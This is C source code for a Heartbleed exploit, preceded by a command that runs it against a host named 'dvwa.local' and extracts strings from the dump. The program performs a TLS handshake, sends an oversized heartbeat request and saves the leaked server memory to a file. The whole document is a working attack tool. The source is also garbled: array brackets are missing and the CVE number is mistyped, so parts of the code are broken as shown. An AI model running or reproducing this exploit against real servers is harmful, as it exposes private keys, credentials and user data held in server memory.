./cve-2014-160 dvwa.local https && strings data_dump.bin
#include <stdio.h> #include <errno.h> #include <sys/types.h> #include <stdint.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <openssl/ssl.h> void wait_server_helo_done(int s); int write_down(char *src, int len, char *fname); int connect_target(const char *name, const char *port); /* TYPES: */ struct helo_message { uint8_t handshake_type; uint8_t length3; /* anything more? */ } __attribute__ ((packed)); struct ext_hb { uint16_t type; uint16_t length; uint8_t mode; } __attribute__ ((packed)); struct helo_message_client { struct helo_message helo_message; uint16_t version; uint32_t timestamp; uint8_t random28; uint8_t sessid_length; uint16_t cipher_suites; uint16_t ciphers16; uint8_t compression_method_cnt; uint8_t compression_methods1; uint16_t extensions_length; struct ext_hb extension_hb; } __attribute__ ((packed)); struct heartbeat_message { uint8_t type; uint16_t length; uint8_t payload2; uint8_t padding16; } __attribute__ ((packed)); struct tls_generic_message { uint8_t content_type; uint16_t version; uint16_t length; } __attribute__ ((packed)); struct tls_received_message { struct tls_generic_message message; uint8_t payload0x4000 - sizeof(struct tls_generic_message); }; struct tls_message_helo_client { struct tls_generic_message message; struct helo_message_client payload; } __attribute__ ((packed)); struct tls_message_heartbeat { struct tls_generic_message message; struct heartbeat_message payload; } __attribute__ ((packed)); /* TYPES END */ int main(int argc, char **argv) { /* DATA: */ char *name = ""; char *port = "https"; struct tls_message_helo_client client_hlo = { .message = { 22, /* handshake message*/ 0x0103, /* protocol version 3.1 */ htons(sizeof(struct helo_message_client)), }, .payload = { .helo_message = { .handshake_type = 1, /* Client helo */ .length = {0,0, sizeof(struct helo_message_client) - sizeof(struct helo_message)}, }, .version = 0x0103, /* TLS 1.0 */ .timestamp = 0x69624553, .random = "Fuck you asshole! Fuck you!", .sessid_length = 0, .cipher_suites = 0x2000, /* 0x0020 in network order */ .ciphers = {0x14c0,0x0ac0,0x22c0,0x21c0,0x3900,0x3800,0x8800,0x8700,0x0fc0,0x05c0,0x3500,0x8400,0x12c0,0x08c0,0x1cc0,0x1bc0}, .compression_method_cnt = 1, .compression_methods = {0}, .extensions_length = 0x0500, .extension_hb = {0x0f00, 0x0100, 1} } }; struct tls_message_heartbeat hb = { .message = { .content_type = 24, /* heartbeat message */ .version = 0x0103, /* protocol version 3.1 */ .length = htons(sizeof(struct heartbeat_message)) }, .payload = { 1, htons(0x4000 - sizeof(struct heartbeat_message)) } }; /* DATA END. */ if (argc > 1) name = argv1; if (argc > 2) port = argv2; int s = connect_target(name, port); int bt = write(s, &client_hlo, sizeof(client_hlo)); printf("Client helo: sent %d bytes\n", bt); wait_server_helo_done(s); bt = write(s, &hb, sizeof(hb)); printf("Client heartbeat: sent %d bytes\n", bt); /* Now we need to read heartbeat answer of len bytes. */ unsigned char buf65535; bt = recv(s, buf, sizeof(buf), 0); if (-1 == bt) { printf("Cannot read: %s\n", strerror(errno)); exit(5); } if (0 == bt) { printf("Server closed connection\n"); exit(5); } printf("%d bytes received from host\n", bt); write_down(buf, bt, "data_dump.bin"); return 0; } int connect_target(const char *name, const char *port) { int s = socket(AF_INET, SOCK_STREAM, 0); if (-1 == s) { printf("Cannot create socket.\n"); exit(1); } struct addrinfo hints = {0}; hints.ai_family = AF_INET; hints.ai_socktype = SOCK_STREAM; struct addrinfo *endpoint; int result = getaddrinfo(name, port, &hints, &endpoint); if (result) { printf("Cannot reoslve address: %s:%s: %s\n", name, port, gai_strerror(result)); exit(1); } do { struct sockaddr_in *a = (struct sockaddr_in *)endpoint->ai_addr; printf("trying to connect: %s\n", inet_ntoa(a->sin_addr)); result = connect(s, endpoint->ai_addr, endpoint->ai_addrlen); if (!result) { printf("Connected to: %s:%s (%s:%d)\n", name, port, inet_ntoa(a->sin_addr), ntohs(a->sin_port)); return s; } printf("Cannot connect to %s: %s\n", inet_ntoa(a->sin_addr), strerror(errno)); endpoint = endpoint->ai_next; } while(endpoint); close(s); exit(1); } int write_down(char *src, int len, char *fname) { int fd = open(fname, O_RDWR|O_TRUNC|O_CREAT, S_IRUSR|S_IWUSR); if (-1 == fd) { printf("Cannot open %s: %s\n", fname, strerror(errno)); exit(5); } int bt = write(fd, src, len); if (-1 == bt) { printf("Cannot write to %s: %s\n", fname, strerror(errno)); exit(5); } close(fd); printf("%d bytes written into %s\n", bt, fname); } int read_message(int s, struct tls_received_message *p_msg) { int bt = read(s, p_msg, sizeof(struct tls_generic_message)); if (-1 == bt) { printf("Cannot read message: %s\n", strerror(errno)); exit(5); } if (0 == bt) { printf("Server closed connection\n"); exit(5); } printf("Message received (%d bytes): message type: %d; ", bt, p_msg->message.content_type); if (22 != p_msg->message.content_type) return 0; int length = ntohs(p_msg->message.length); if (sizeof(p_msg->payload) < length) length = sizeof(p_msg->payload); printf("Message payload is %d bytes (%d)\n", length, ntohs(p_msg->message.length)); bt = 0; while (bt < length) { int readed = read(s, (uint8_t *)&p_msg->payload + bt, length - bt); if (-1 == readed) { printf("Cannot read: %s\n", strerror(errno)); break; } if (0 == readed) { printf("Server closed connection\n"); break; } bt += readed; } return bt; } void wait_server_helo_done(int s) { struct tls_received_message msg; struct helo_message *hlo_msg = (struct helo_message *)&msg.payload; int bt; do { bt = read_message(s, &msg); if (bt) printf("Payload of %d bytes: handshake type: %d\n", bt, hlo_msg->handshake_type); if (ntohs(msg.message.length) > bt) { printf("Only %d of %d message bytes received. Aborting.\n", bt, ntohs(msg.message.length)); break; } if (hlo_msg->handshake_type == 14) return; } while (msg.message.content_type == 22 && hlo_msg->handshake_type != 14); exit(5); }